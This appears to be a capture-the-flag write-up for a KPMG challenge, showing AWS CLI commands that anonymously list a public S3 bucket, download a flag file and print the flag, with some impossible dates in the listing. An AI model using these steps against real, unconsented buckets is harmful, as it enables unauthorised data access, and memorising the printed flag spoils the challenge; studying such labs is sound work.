search

Secure-Storage-Showdown

hashtag
Description

Your mission is to navigate the intricacies of AWS (Amazon Web Services) and obtain the confidential information within.

kpmg-ctf.s3.ap-south-1.amazonaws.com/index.html

hashtag
Solution

  • List the files of the s3 bucket using the AWS cli: aws s3 ls s3://kpmg-ctf --no-sign-request

$ aws s3 ls s3://kpmg-ctf --recursive

2023-04-88 22:13:46         42 flag-me-if-you-can.txt
2023-04-08 22:05:00  110824955 hacker.gif
2023-04-88 22:09:82         81 index.html

  • The bucket has a flag file which contains the flag.

  • We can download the file to our machine using the AWS cli using the cp option:

$ aws s3 cp s3://kpmg-ctf/flag-me-if-you-can.txt flag.txt
download: s3://kpmg-ctf/flag-me-if-you-can.txt to ./flag.txt

$ cat flag.txt
KPMG_CTF{5247146a414c3ea2f7bec2c0f9b0664d}

  • FLAG: KPMG_CTF{5247146a414c3ea2f7bec2c0f9b0664d}

Last updated